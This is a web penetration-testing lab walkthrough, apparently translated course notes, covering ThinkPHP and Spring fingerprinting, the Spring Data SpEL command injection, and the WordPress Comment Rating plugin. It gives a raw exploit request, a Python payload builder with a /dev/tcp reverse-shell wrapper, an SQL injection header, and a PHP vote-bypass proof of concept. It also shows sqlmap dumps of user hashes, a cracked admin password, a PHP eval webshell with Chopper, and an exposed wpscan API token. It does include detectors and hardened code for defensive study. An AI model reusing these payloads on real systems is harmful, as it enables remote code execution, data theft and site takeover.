Vulnerability Discovery - Vulnerability Probe Types, Exploitation and Remediation for Web Applications

QQ截图20220316093915.jpg

Principle Analysis

  1. Known CMS
  • For example the common dedecms, discuz and wordpress source structures. These are usually developed without a framework, though a minority are built on one. Security testing of this kind of program starts from publicly disclosed vulnerabilities; if none apply, fall back to white-box code audit to dig for your own. (1. Search the product name on vulnerability platforms such as seebug and cnvd; 2. Use tools and frameworks such as cmsscan and wpscan; 3. Code audit, from three angles: functions, features and framework.)
  2. Development framework
  • For example programs built on thinkphp, spring, flask and the like. The normal testing approach for such programs: first obtain the framework information (name and version), then test the publicly known security issues of that framework; if none apply, fall back to white-box code audit to dig for your own.
  3. Unknown CMS
  • For example the in-house programs of a company or individual, or a secondary development of some CMS. Testing approach for such programs: if you can recognise the CMS it was built from, follow the known-CMS approach; if you cannot, probe with general-purpose scanners or scripts, or probe by hand (functionality points, parameters, blind guessing); and when the source is available, code audit is again an option.
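All three branches start from the same question: what does the target run? The following is an added example, written for these notes rather than taken from any tool the page mentions, of the "first identify the CMS or framework, then decide between public exploits, scanners and code audit" step. It applies a rule table of response markers to a few constructed HTTP responses (the WordPress generator tag, a ThinkPHP error page footer, Spring Boot's Whitelabel error page, Werkzeug's Server header); the marker strings are heuristics chosen here, not an exhaustive fingerprint database, and the sample responses are made up.

```python
"""Fingerprint the CMS or framework behind an HTTP response (added example, offline)."""
import re
from dataclasses import dataclass


@dataclass
class Response:
    status: int
    headers: dict   # header name -> value (case of the name does not matter)
    body: str


# (product, category from the page's three buckets, where to look, regex, capture group holding the version)
# The markers are heuristics picked for this example; real scanners carry hundreds of them.
RULES = [
    ("WordPress", "known CMS", "body", r'<meta name="generator" content="WordPress ?([\d.]*)"', 1),
    ("WordPress", "known CMS", "body", r"/wp-(?:content|includes)/", None),
    ("Discuz!", "known CMS", "body", r'<meta name="generator" content="Discuz! ?([\w.]*)"', 1),
    ("DedeCMS", "known CMS", "body", r"Powered by DedeCMS|/templets/default/", None),
    # ThinkPHP error/404 pages print the name and "V5.0.20"-style version, possibly with tags in between
    ("ThinkPHP", "framework", "body", r"ThinkPHP(?:\s|<[^>]*>)*V?(\d+(?:\.\d+)+)", 1),
    ("ThinkPHP", "framework", "body", r"\bThinkPHP\b", None),
    ("Spring Boot", "framework", "body", r"Whitelabel Error Page", None),
    ("Flask", "framework", "header:server", r"Werkzeug/([\d.]+)", 1),
]


def _header(resp, name):
    for key, value in resp.headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def fingerprint(resp):
    """Return {product: {"category": ..., "version": str|None}} for every rule that fires.

    A weak marker (no version group) never erases a version that a stronger
    marker already captured for the same product.
    """
    hits = {}
    for product, category, where, pattern, group in RULES:
        haystack = resp.body if where == "body" else _header(resp, where.split(":", 1)[1])
        match = re.search(pattern, haystack, re.I)
        if not match:
            continue
        entry = hits.setdefault(product, {"category": category, "version": None})
        if group is not None and match.group(group):
            entry["version"] = match.group(group)
    return hits


def classify(resp):
    """Map a response to (bucket, product, version) following the page's three cases.

    A CMS hit wins over a framework hit: a WordPress site that happens to sit on a
    framework is still tested with the known-CMS approach first.
    """
    hits = fingerprint(resp)
    if not hits:
        return ("unknown CMS", None, None)
    for product, info in hits.items():
        if info["category"] == "known CMS":
            return ("known CMS", product, info["version"])
    product, info = next(iter(hits.items()))
    return ("framework", product, info["version"])


# Constructed sample responses (not captured from any real site)
SAMPLES = {
    "wordpress": Response(200, {"Server": "nginx"},
                          '<html><head><meta name="generator" content="WordPress 5.9" />'
                          '<link rel="stylesheet" href="/wp-content/themes/x/style.css"></head></html>'),
    "thinkphp_error": Response(500, {"Server": "Apache"},
                               '<h1>页面错误！请稍后再试～</h1><div class="copyright">'
                               '<a title="官方网站" href="http://www.thinkphp.cn">ThinkPHP</a>'
                               '<span> V5.0.20 </span></div>'),
    "spring": Response(500, {"Content-Type": "text/html"},
                       "<html><body><h1>Whitelabel Error Page</h1>"
                       "<p>This application has no explicit mapping for /error</p></body></html>"),
    "flask": Response(200, {"Server": "Werkzeug/2.2.2 Python/3.10.6"}, "<p>hello</p>"),
    "custom": Response(200, {"Server": "nginx"}, "<html><body>Intranet portal</body></html>"),
}

if __name__ == "__main__":
    for name, resp in SAMPLES.items():
        print(name, "->", classify(resp))
```

In practice the body of an error page (a 404, a request with a broken parameter) is often the most revealing input, which is exactly why the ThinkPHP walkthrough below leans on the error message; feed `classify()` both the normal page and a deliberately broken request.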

Penetration Testing of Framework-Based Source Code

ThinkPHP

Try using fofa to find sites of the same kind

QQ截图20220316100838.jpg

Opening the page, it looks similar to the site mentioned in the course

QQ截图20220316100955.jpg

The error message reveals that the framework is ThinkPHP

QQ截图20220316101105.jpg

No vulnerability detected

QQ截图20220316101157.jpg

Spring framework vulnerability

QQ截图20220316102120.jpg

Start the vulnerable environment

QQ截图20220316102411.jpg

Enter the target range as instructed

QQ截图20220316102738.jpg

Modify the given payload (target host and port) and send the attack request:

POST /users?page=&size=5 HTTP/1.1
Host: 192.168.50.10:8080
Connection: keep-alive
Content-Length: 124
Pragma: no-cache
Cache-Control: no-cache
Origin: http://192.168.50.10:8080
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://localhost:8080/users?page=0&size=5
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

QQ截图20220316103047.jpg

After the attack, check inside the container: /tmp/success exists, so the command injection can be turned into a reverse shell. Note that Runtime.exec() starts the program directly without a shell, so redirections such as `>&` in the usual bash one-liner are not interpreted; wrap the command (for example `bash -c` with a base64-encoded command) before sending it.

QQ截图20220316102959.jpg
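The request above abuses the way Spring Data's property binder evaluates the parameter *name* `username[...]` as a SpEL expression (this is vulhub's CVE-2018-1273 environment, Spring Data Commons). The following is an added example, not vulhub's or the page's code, that rebuilds the same body for any command, computes the Content-Length the page shows (124 for `touch /tmp/success`), wraps shell syntax so that Java's Runtime.exec() can run a reverse shell, and gives a defender the matching check on request bodies. The host and path are the page's; the reverse-shell address is a placeholder.

```python
"""Spring Data property-path SpEL injection: payload builder and detector (added example)."""
import base64
import re
from urllib.parse import parse_qsl

# The expression from the page's request; only the command inside exec("...") changes.
SPEL_TEMPLATE = ('#this.getClass().forName("java.lang.Runtime")'
                 '.getRuntime().exec("{cmd}")')


def build_body(cmd):
    """Form body exactly as on the page: the expression sits in the key, every value is empty."""
    return "username[{}]=&password=&repeatedPassword=".format(SPEL_TEMPLATE.format(cmd=cmd))


def build_request(host, path, cmd):
    """Raw HTTP/1.1 request text; Content-Length is computed from the encoded body, not guessed."""
    body = build_body(cmd)
    headers = [
        "POST {} HTTP/1.1".format(path),
        "Host: {}".format(host),
        "Content-Type: application/x-www-form-urlencoded",
        "Content-Length: {}".format(len(body.encode("utf-8"))),
        "Connection: close",
    ]
    return "\r\n".join(headers) + "\r\n\r\n" + body


def wrap_for_runtime_exec(shell_cmd):
    """Runtime.exec() splits the string on whitespace and runs argv[0] directly, without a shell,
    so pipes, redirects and '>&' in a reverse-shell one-liner arrive at bash as literal arguments.
    The usual workaround: base64 the command and let bash reassemble it through brace expansion,
    which needs no spaces at all (the base64 alphabet has none)."""
    b64 = base64.b64encode(shell_cmd.encode()).decode()
    return "bash -c {{echo,{}}}|{{base64,-d}}|{{bash,-i}}".format(b64)


# Defender side: SpEL in a form field *name* has no business in a normal request.
SPEL_MARKERS = re.compile(r"\[\s*#|\bT\(|getClass\(\)|java\.lang\.Runtime", re.I)


def suspicious_param_names(body):
    """Return the form field names that look like SpEL; the values are irrelevant for this bug."""
    return [name for name, _ in parse_qsl(body, keep_blank_values=True) if SPEL_MARKERS.search(name)]


if __name__ == "__main__":
    # Placeholder listener address; 192.168.50.10:8080 is the page's vulhub target.
    shell = wrap_for_runtime_exec("bash -i >& /dev/tcp/10.0.0.1/4444 0>&1")
    print(build_request("192.168.50.10:8080", "/users?page=&size=5", shell))
    print("flagged:", suspicious_param_names(build_body("touch /tmp/success")))
```

The detector is deliberately narrow (it keys on `[#`, `T(`, `getClass()` and `java.lang.Runtime` in parameter names) so it can run on access or WAF logs without drowning in false positives; the real fix is the Spring Data Commons upgrade the vulhub environment is built to demonstrate.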

WordPress penetration testing

QQ截图20220316110727.jpg

Open the target range and scan it with wpscan as instructed

QQ截图20220316132714.jpg

wpscan --url http://124.70.71.251:40807/ --api-token bieDbQWesQYEt2aesWJt2sDEE910sw3H3ep7dxlC3rc

An SQL injection vulnerability is found (in the Comment Rating plugin)

QQ截图20220316140615.jpg

Look up the exploitation process from the published advisory that the scan result points to:

# Exploit Title: Wordpress plugin: Comment Rating SQL injection
# Google Dork: 
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4



Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php (lines 48-54 and 77)

First it takes the IP from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
   // die('error|You have already voted on this item!'); 
   // Just don't count duplicated votes
   $duplicated = 1;
   $ck_ips = $row['ck_ips'];
}

Later an UPDATE is made without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


So let's take a look in the DB

mysql> select * from wp_comment_rating;
+---------------+----------------+--------------+----------------+
| ck_comment_id | ck_ips         | ck_rating_up | ck_rating_down |
+---------------+----------------+--------------+----------------+
|             2 | ,20.209.10.130 |            1 |              0 |
|             3 |                |            0 |              0 |
+---------------+----------------+--------------+----------------+
2 rows in set (0.00 sec)


Now make an HTTP request with an injection in the HTTP_X_FORWARDED_FOR header:

GET /wordpress/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_ HTTP/1.1 
Host: 192.168.1.10
Accept-Encoding: gzip, deflate
X-Forwarded-For: ', ck_ips=(select user()) WHERE ck_comment_id=2#
Connection: keep-alive


And the result is:

mysql> select * from wp_comment_rating;
+---------------+---------------------+--------------+----------------+
| ck_comment_id | ck_ips              | ck_rating_up | ck_rating_down |
+---------------+---------------------+--------------+----------------+
|             2 | wordpress@localhost |            2 |              0 |
|             3 |                     |            0 |              0 |
+---------------+---------------------+--------------+----------------+
2 rows in set (0.00 sec)

Cheers

=======================================================================================


# Exploit Title: Wordpress plugin: Comment Rating Bypass vote limitation
# Date: 21/02/2013
# Exploit Author: ebanyu
# Url Author: www.ebanyu.com.ar
# Vendor Homepage: wealthynetizen.com
# Software Link: http://wealthynetizen.com/wordpress-plugin-comment-rating/
# Version: 2.9.32
# Tested on: Fedora 18 + mysql 5.5 + php 5.4


Vulnerable Code: /wp-content/plugins/comment-rating/ck-processkarma.php (lines 48-54 and 77)

First it takes the IP from the HTTP_X_FORWARDED_FOR header.
-----------------------------------------------------------------------
$ip = getenv("HTTP_X_FORWARDED_FOR") ? getenv("HTTP_X_FORWARDED_FOR") : getenv("REMOTE_ADDR");
if(strstr($row['ck_ips'], $ip)) {
   // die('error|You have already voted on this item!'); 
   // Just don't count duplicated votes
   $duplicated = 1;
   $ck_ips = $row['ck_ips'];
}

Later an UPDATE is made without filtering the input.
------------------------------------------------------------------------
$query = "UPDATE `$table_name` SET ck_rating_$direction = '$rating', ck_ips = '" . $ck_ips  . "' WHERE ck_comment_id = $k_id";


Now, to bypass the vote limitation, we just have to add the HTTP_X_FORWARDED_FOR header and change it on every request.

A simple PoC is made in PHP.

<?php
// PoC: add votes past the limit by sending a fresh random X-Forwarded-For on every
// request, because the plugin takes that header as the voter's identity.
define('HOST', 'http://localhost/wordpress/');
define('IDCOMMENT', 2);
define('VOTES', 10);   // how many votes to add
$url = parse_url(HOST);
define('URL', $url['path'] . 'wp-content/plugins/comment-rating/ck-processkarma.php?id=' . IDCOMMENT . '&action=add&path=a&imgIndex=1_14_');
for ($i = 0; $i < VOTES; $i++) lvlup();

function lvlup() {
    global $url;
    $header  = "GET " . URL . " HTTP/1.1\r\n";
    $header .= "Host: " . $url['host'] . "\r\n";
    $header .= "Accept-Encoding: gzip, deflate\r\n";
    // A random spoofed client address per request defeats the strstr() duplicate check
    $header .= "X-Forwarded-For: " . long2ip(mt_rand(0, mt_getrandmax())) . "\r\n";
    $header .= "Connection: close\r\n\r\n";
    $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
    // socket_connect() expects a dotted-quad address, so resolve the host name first
    socket_connect($socket, gethostbyname($url['host']), 80);
    socket_write($socket, $header);
    // Read until EOF so the server has finished handling the vote before we close
    while (($chunk = socket_read($socket, 4096)) !== '' && $chunk !== false) {}
    socket_close($socket);
}
?>
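The two advisories above share one root cause pair: the plugin takes X-Forwarded-For as the voter's identity (so the duplicate check is defeated by a header the client controls) and concatenates that value into the UPDATE (so the same header is an SQL injection point). The following is an added example, not the plugin's code: a Python/SQLite re-creation of the quoted lines so both bugs can be run offline, next to a hardened version of the same feature. Differences from the real target are marked in comments: SQLite needs `--` where MySQL accepts `#`, and `sqlite_version()` stands in for `user()`. The plugin's non-duplicate branch (append the new IP to ck_ips) is not shown in the advisory and is reconstructed here as an assumption.

```python
"""Comment Rating vote handler, vulnerable and hardened, modelled on SQLite (added example)."""
import ipaddress
import sqlite3

SQLITE_VERSION = sqlite3.sqlite_version   # what "select sqlite_version()" returns in the injection


def setup_db():
    """In-memory copy of wp_comment_rating with the two rows the advisory shows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_comment_rating (ck_comment_id INTEGER, ck_ips TEXT, "
                 "ck_rating_up INTEGER, ck_rating_down INTEGER)")
    conn.executemany("INSERT INTO wp_comment_rating VALUES (?, ?, ?, ?)",
                     [(2, ",20.209.10.130", 1, 0), (3, "", 0, 0)])
    return conn


def read_row(conn, comment_id):
    return conn.execute("SELECT * FROM wp_comment_rating WHERE ck_comment_id = ?",
                        (comment_id,)).fetchone()


def vulnerable_vote(conn, k_id, remote_addr, xff=None, direction="up"):
    """Mirror of ck-processkarma.php: trusts X-Forwarded-For, tests duplicates with a
    substring match, and concatenates everything into the UPDATE. Returns the SQL it ran."""
    ip = xff if xff else remote_addr            # getenv("HTTP_X_FORWARDED_FOR") ?: getenv("REMOTE_ADDR")
    row = read_row(conn, k_id)
    old_ips = row[1]
    rating = row[2] if direction == "up" else row[3]
    if ip in old_ips:                           # strstr(): "10.0.0.1" also "matches" ",10.0.0.10"
        ck_ips = old_ips                        # duplicated vote, not counted
    else:
        ck_ips = old_ips + "," + ip             # assumption: the else-branch the advisory does not quote
        rating += 1
    query = ("UPDATE `wp_comment_rating` SET ck_rating_{d} = '{r}', ck_ips = '{ips}' "
             "WHERE ck_comment_id = {k}").format(d=direction, r=rating, ips=ck_ips, k=k_id)
    conn.execute(query)                         # SQLite keeps the right-most assignment to ck_ips
    conn.commit()
    return query


def client_ip(remote_addr, xff, trusted_proxies):
    """Believe X-Forwarded-For only when the TCP peer is one of our own proxies, take the hop
    that proxy appended (right-most), and require it to parse as an IP address."""
    if xff and remote_addr in trusted_proxies:
        try:
            return str(ipaddress.ip_address(xff.split(",")[-1].strip()))
        except ValueError:
            pass                                # garbage in the header: fall back to the peer
    return str(ipaddress.ip_address(remote_addr))


def hardened_vote(conn, k_id, remote_addr, xff=None, direction="up", trusted_proxies=()):
    """Same feature with three fixes: validated identity, exact-match duplicate test, bound
    parameters. Returns True when the vote was counted, False when it was a duplicate."""
    if direction not in ("up", "down"):         # the column name only ever comes from this whitelist
        raise ValueError("bad direction")
    k_id = int(k_id)                            # the WHERE value must be a number, never raw text
    ip = client_ip(remote_addr, xff, trusted_proxies)
    row = read_row(conn, k_id)
    if row is None:
        return False
    seen = [part for part in row[1].split(",") if part]
    if ip in seen:                              # list membership, not strstr()
        return False
    seen.append(ip)
    column = "ck_rating_" + direction
    conn.execute("UPDATE wp_comment_rating SET {c} = {c} + 1, ck_ips = ? "
                 "WHERE ck_comment_id = ?".format(c=column), ("," + ",".join(seen), k_id))
    conn.commit()
    return True


if __name__ == "__main__":
    conn = setup_db()
    # The advisory's header, with SQLite's comment syntax in place of MySQL's '#'
    print(vulnerable_vote(conn, 2, "10.0.0.5",
                          xff="', ck_ips=(select sqlite_version()) WHERE ck_comment_id=2 -- "))
    print(read_row(conn, 2))
```

Against the real MySQL target the payload is the one in the advisory (`#` comment, `user()`); the model only swaps the two dialect-specific tokens. The hardened version also closes the vote-limit bypass, which no amount of SQL escaping would have fixed: as long as the client chooses its own X-Forwarded-For, "one vote per IP" is not a limit.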

Try injection testing with sqlmap. Note that sqlmap only tests the injection points it is given: the command below exercises the GET parameters id, action, path and imgIndex, while the advisory's injection point is the X-Forwarded-For header, which is not among sqlmap's default test targets. To aim at the header, mark it with sqlmap's `*` injection marker, e.g. --headers="X-Forwarded-For: *".

sqlmap -u "http://124.70.71.251:40807/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_"

QQ截图20220316142158.jpg

Use sqlmap to dump the users table and obtain the username and password hash

sqlmap -u "http://124.70.71.251:40807/wp-content/plugins/comment-rating/ck-processkarma.php?id=2&action=add&path=a&imgIndex=1_14_" -D test -T wp_users --dump

QQ截图20220316142846.jpg

sqlmap's built-in dictionary attack has already recovered the password from the WordPress phpass hash ($P$...): 12qwaszx. The hash is not decrypted; it is matched against a wordlist, which only works because the password is weak.

+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| ID | user_url | user_pass                                     | user_email      | user_login | user_status | display_name | user_nicename | user_registered     | user_activation_key |
+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+
| 1  | <blank>  | $P$Bj8Pp.mH8GIjcXQqp1ZuyRw7i4oV72. (12qwaszx) | admin@admin.com | admin      | 0           | admin        | admin         | 2013-07-07 02:56:14 | <blank>             |
+----+----------+-----------------------------------------------+-----------------+------------+-------------+--------------+---------------+---------------------+---------------------+

Try logging in with the recovered credentials

admin
12qwaszx

QQ截图20220316143415.jpg

In the plugin editor of the admin panel, write a one-line webshell (一句话木马) into the plugin file

QQ截图20220316143739.jpg

Connect to it with China Chopper (菜刀)

# Chopper address
http://124.70.71.251:40807/wp-content/plugins/comment-rating/comment-rating.php

QQ截图20220316150214.jpg

QQ截图20220316150221.jpg
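The page ends with a one-line shell written into comment-rating.php through wp-admin and reached with Chopper. The following is an added example of the matching check for the defending side, written for these notes (not WordPress's or the plugin's code): a content scan for the PHP constructs a one-liner or lightly obfuscated shell needs, plus a hash comparison against a known-good manifest of the plugin directory. It runs on a constructed copy of the plugin in a temporary directory so it works offline; the file contents, the planted shells and the manifest are all made up for the demo, and the patterns are heuristics to tune for your own tree.

```python
"""Find a webshell planted in a plugin directory: content scan plus integrity check (added example)."""
import hashlib
import os
import re
import tempfile

# Constructs a one-liner or lightly obfuscated shell almost always needs (heuristics)
WEBSHELL_PATTERNS = [
    re.compile(r"\b(?:eval|assert|system|passthru|shell_exec|exec|popen|proc_open)\s*\(\s*"
               r"(?:@?\$_(?:POST|GET|REQUEST|COOKIE)\b|base64_decode|gzinflate|str_rot13)", re.I),
    re.compile(r"\$_(?:POST|GET|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),          # $_POST['f']($_POST['a'])
    re.compile(r"preg_replace\s*\(\s*([\"'])/[^\"']*?/[a-zA-Z]*e[a-zA-Z]*\1", re.I),  # /e modifier = eval
    re.compile(r"\b(?:create_function|call_user_func(?:_array)?)\s*\(\s*\$_", re.I),
]


def _rel(path, root):
    return os.path.relpath(path, root).replace(os.sep, "/")


def scan_file(path):
    """Return (line_number, matched_text) for every suspicious construct in one file."""
    findings = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for lineno, line in enumerate(fh, 1):
            for pattern in WEBSHELL_PATTERNS:
                match = pattern.search(line)
                if match:
                    findings.append((lineno, match.group(0)))
                    break
    return findings


def scan_tree(root, exts=(".php", ".phtml", ".inc")):
    """Walk a plugin/theme directory; {relative path: findings} for files with at least one hit."""
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(exts):
                full = os.path.join(dirpath, name)
                hits = scan_file(full)
                if hits:
                    report[_rel(full, root)] = hits
    return report


def sha256_of(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_manifest(root):
    """relative path -> sha256 of every file; take it from a trusted copy (a fresh plugin download)."""
    return {_rel(os.path.join(d, f), root): sha256_of(os.path.join(d, f))
            for d, _, fs in os.walk(root) for f in fs}


def check_integrity(root, manifest):
    """Compare the live tree with the manifest: modified, unknown (added) and missing files."""
    live = build_manifest(root)
    return {
        "modified": sorted(p for p in live if p in manifest and live[p] != manifest[p]),
        "unknown": sorted(p for p in live if p not in manifest),
        "missing": sorted(p for p in manifest if p not in live),
    }


def demo():
    """Constructed plugin tree: record a manifest, then plant shells the way the page does."""
    with tempfile.TemporaryDirectory() as root:
        plugin = os.path.join(root, "comment-rating")
        os.makedirs(plugin)
        clean_files = {   # made-up stand-ins for the real plugin files
            "comment-rating.php": "<?php\n/* Plugin Name: Comment Rating */\nfunction ck_init() {}\n",
            "ck-processkarma.php": "<?php\n$ip = getenv('HTTP_X_FORWARDED_FOR') ? "
                                   "getenv('HTTP_X_FORWARDED_FOR') : getenv('REMOTE_ADDR');\n",
        }
        for name, content in clean_files.items():
            with open(os.path.join(plugin, name), "w") as fh:
                fh.write(content)
        manifest = build_manifest(root)                      # taken while the tree is still clean
        # The attacker's edit through the plugin editor: a one-line shell appended to the plugin file
        with open(os.path.join(plugin, "comment-rating.php"), "a") as fh:
            fh.write("<?php @eval($_POST['cmd']); ?>\n")
        # A second, dropped file using a variable function, which the content scan does not catch
        with open(os.path.join(plugin, ".cache.php"), "w") as fh:
            fh.write("<?php $f = $_REQUEST['f']; $f($_REQUEST['a']); ?>\n")
        return scan_tree(root), check_integrity(root, manifest)


if __name__ == "__main__":
    print(demo())
```

The two checks cover each other's blind spot: the content scan catches the appended `eval($_POST[...])` but not the variable-function shell in the dropped file, while the manifest comparison flags both the modified plugin file and the unknown file, and is the reason to keep a hash list (or re-download the plugin and diff) rather than rely on grep alone.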